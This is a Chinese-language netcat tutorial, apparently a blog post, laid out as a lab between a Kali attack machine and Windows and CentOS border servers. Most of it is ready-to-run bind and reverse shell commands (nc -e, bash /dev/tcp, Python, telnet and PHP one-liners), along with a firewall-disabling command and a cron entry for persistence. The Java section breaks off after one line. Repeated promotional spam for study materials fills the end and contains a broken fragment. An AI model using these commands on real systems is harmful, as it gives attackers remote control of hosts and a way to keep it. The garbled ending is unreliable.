apt install netcat -y
2 使用方法
查看帮助:
nc -h
-d // 后台模式(windows下)
-e filename // 程序重定向
-g gateway // 网关。设詈路由器通信网关,最多可以设詈8个。
-G num // 设置源路由指向器的数量,为4的倍数。
-i secs // 设置时间间隔,以便传送信息及扫描通信端口。
-l // 使用监听模式。
-n // 直接使用IP地址,不通过域名服务器。
-o file // 输出文件,把往来传输的数据转换为十六进制字节码后保存在该文件中。
-p port // 设置通信端口。
-r // 随机指定本地与远程主机的通信端口。
-s addr // 源地址,设詈本地主机送出数据包的IP地址。
-t // 应答远程登录。
-u // 使用UDP传输。
-v // 详细输出。
-w secs // 设置超时秒数。
-z // 将输入输出功能关闭,只在扫描通信端口时使用。
案例:
nc -v -z 目标IP 80-200 // 指定端口扫描
nc -nv 目标IP 21 // Banner 抓取
nc -lvnp 4444 // 本地端口监听
nc -nvv 目标IP 4444 // 连接远程主机
2.1 正向shell
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
nc -ldp 4444 -e c:\windows\system32\cmd.exe
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
nc -lvp 4444 -e /bin/sh
kali(攻击机,外网地址:192.168.8.48)
连接windows shell:
nc 192.168.8.56 4444
连接CentOS Shell:
nc 192.168.8.35 5555
# 注意:出现(UNKNOWN) [192.168.8.35] 56 (?) : No route to host的情况可以关闭目标主机防火墙
systemctl stop firewalld
2.2 nc反弹shell
kali(攻击机,外网地址:192.168.8.48)
nc -lvnp 4444
# 监听4444和5555端口
nc -lvnp 5555
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
nc -d 192.168.8.48 4444 -e c:\windows\system32\cmd.exe
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
nc -d 192.168.8.48 5555 -e /bin/sh
2.3 其它反弹shell
2.3.1 Bash反弹shell
kali(攻击机,外网地址:192.168.8.48)
nc -lvnp 7777
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
bash -i >& /dev/tcp/192.168.8.48/7777 0>&1
# TCP
bash -i >& /dev/udp/192.168.8.48/7777 0>&1
# UDP
以tcp为例:
可以写入定时任务维持权限,crontab -e
编辑当前用户的任务,或者是写到计划任务目录,一般是/var/spool/cron/
目录,ubuntu是/var/spool/cron/crontabs
。
* * * * * /bin/bash -i >& /dev/tcp/192.168.8.48/4444 0>&1
2.3.2 python反弹shell
kali(攻击机,外网地址:192.168.8.48)
nc -lvnp 8888
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.8.48",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2.3.3 Telnet反弹shell
mknod backpipe p && telnet 192.168.8.48 4444 0<backpipe | /bin/bash 1>backpipe
2.3.4 PHP反弹shell
php -r '$sock=fsockopen("192.168.8.48",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
2.3.5 Java反弹shell
r = Runtime.getRuntime()
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/2f07ecef558dab1e72555df8828c0329.png)
![img](https://img-blog.csdnimg.cn/img_convert/f8262f92f8271112d00b34ffee6052ce.png)
![img](https://img-blog.csdnimg.cn/img_convert/9edeef0eb7fa9ed000dac9813a0620d2.png)
![img](https://img-blog.csdnimg.cn/img_convert/711524b346dc0f11042f64dae5d56a93.png)
![img](https://img-blog.csdnimg.cn/img_convert/ed6103116075b7c74f0071c0b73c2de3.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
g-f1YuCoOJ-1715569064458)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**